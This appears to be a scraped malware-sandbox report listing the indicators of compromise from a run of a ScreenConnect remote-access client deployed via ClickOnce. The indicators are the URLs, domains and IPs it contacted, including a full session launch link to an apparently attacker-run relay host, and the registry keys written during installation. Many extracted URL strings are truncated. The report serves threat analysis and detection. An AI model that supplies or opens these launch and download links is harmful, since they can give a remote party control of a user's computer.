https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session
|
37.221.67.19
|
||
http://www.urwpp.deDPlease
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
|
37.221.67.19
|
||
http://www.zhongyicts.com.cn
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.bingmapsportal.com
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
|
unknown
|
||
https://t0.ssl.ak.dynamic.tiles.virt
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManagp
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configt
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config-U
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationx
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
|
37.221.67.19
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationw
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Routes/
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientSe
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applications
|
unknown
|
||
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
|
unknown
|
||
http://www.w3.or
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationZ
|
unknown
|
||
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
|
unknown
|
||
https://t0.ssl.ak.dynamic.tiles.virtuX
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Locations
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application089a7
|
unknown
|
||
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
|
unknown
|
||
http://www.carterandcone.coml
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstage
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll63:
|
unknown
|
||
http://www.fontbureau.com/designers/frere-jones.html
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationK
|
unknown
|
||
https://dynamic.t
|
unknown
|
||
https://g.live.com/odclientsettings/Prod-C:
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe
|
37.221.67.19
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationX
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Routes/Transit
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationuLXGWokl
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.manifest
|
37.221.67.19
|
||
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationre=msila
|
unknown
|
||
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
|
unknown
|
||
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application1
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.dll
|
37.221.67.19
|
||
http://www.fontbureau.com/designersG
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Clie
|
unknown
|
||
http://www.fontbureau.com/designers/?
|
unknown
|
||
http://www.founder.com.cn/cn/bThe
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application8
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Routes/Driving
|
unknown
|
||
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
|
unknown
|
||
http://www.fontbureau.com/designers?
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application2
|
unknown
|
||
http://www.tiro.com
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wih
|
unknown
|
||
http://www.goodfont.co.kr
|
unknown
|
||
http://schemas.micro
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Core.dll
|
37.221.67.19
|
||
https://dev.ditu.live.com/mapcontrol/logging.ashx
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
|
37.221.67.19
|
||
http://www.typography.netD
|
unknown
|
||
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
|
unknown
|
||
http://www.galapagosdesign.com/staff/dennis.htm
|
unknown
|
||
http://www.xrml.org/schema/2001/11/xrml2coreS
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe
|
37.221.67.19
|
||
http://www.w3.o
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exx
|
unknown
|
||
http://www.fonts.com
|
unknown
|
||
http://www.sandoll.co.kr
|
unknown
|
||
http://www.sakkal.com
|
unknown
|
||
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
|
unknown
|
||
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
http://www.fontbureau.com
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configg
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe_
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back
|
unknown
|
||
https://dev.ditu.live.com/REST/v1/Transit/Stops/
|
unknown
|
||
http://www.xrml.org/schema/2001/11/xrml2core
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wi
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cp9856.chelokipotlester.icu
|
37.221.67.19
|
||
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
www.google.com
|
142.250.185.228
|
||
cp3back96.site
|
37.221.67.19
|
||
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
37.221.67.19
|
cp3back96.site
|
Russian Federation
|
||
142.250.185.228
|
www.google.com
|
United States
|
||
192.168.2.16
|
unknown
|
unknown
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
|
cval
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Security
|
c688cf83-9945-5ff6-0e1e-1ff1f8a2ec9a
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
|
Blob
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
|
Blob
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
|
ComponentStore_RandomString
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
|
ComponentStore_RandomString
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
|
StateStore_RandomString
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
|
NonCanonicalData
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
lock!010000003d485a0b0c1e00003c1e00000000000000000000d0cdac5cde2bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
|
NonCanonicalData
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
appid
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
|
implication!scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_441816c4a7b689b2\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
identity
|
||
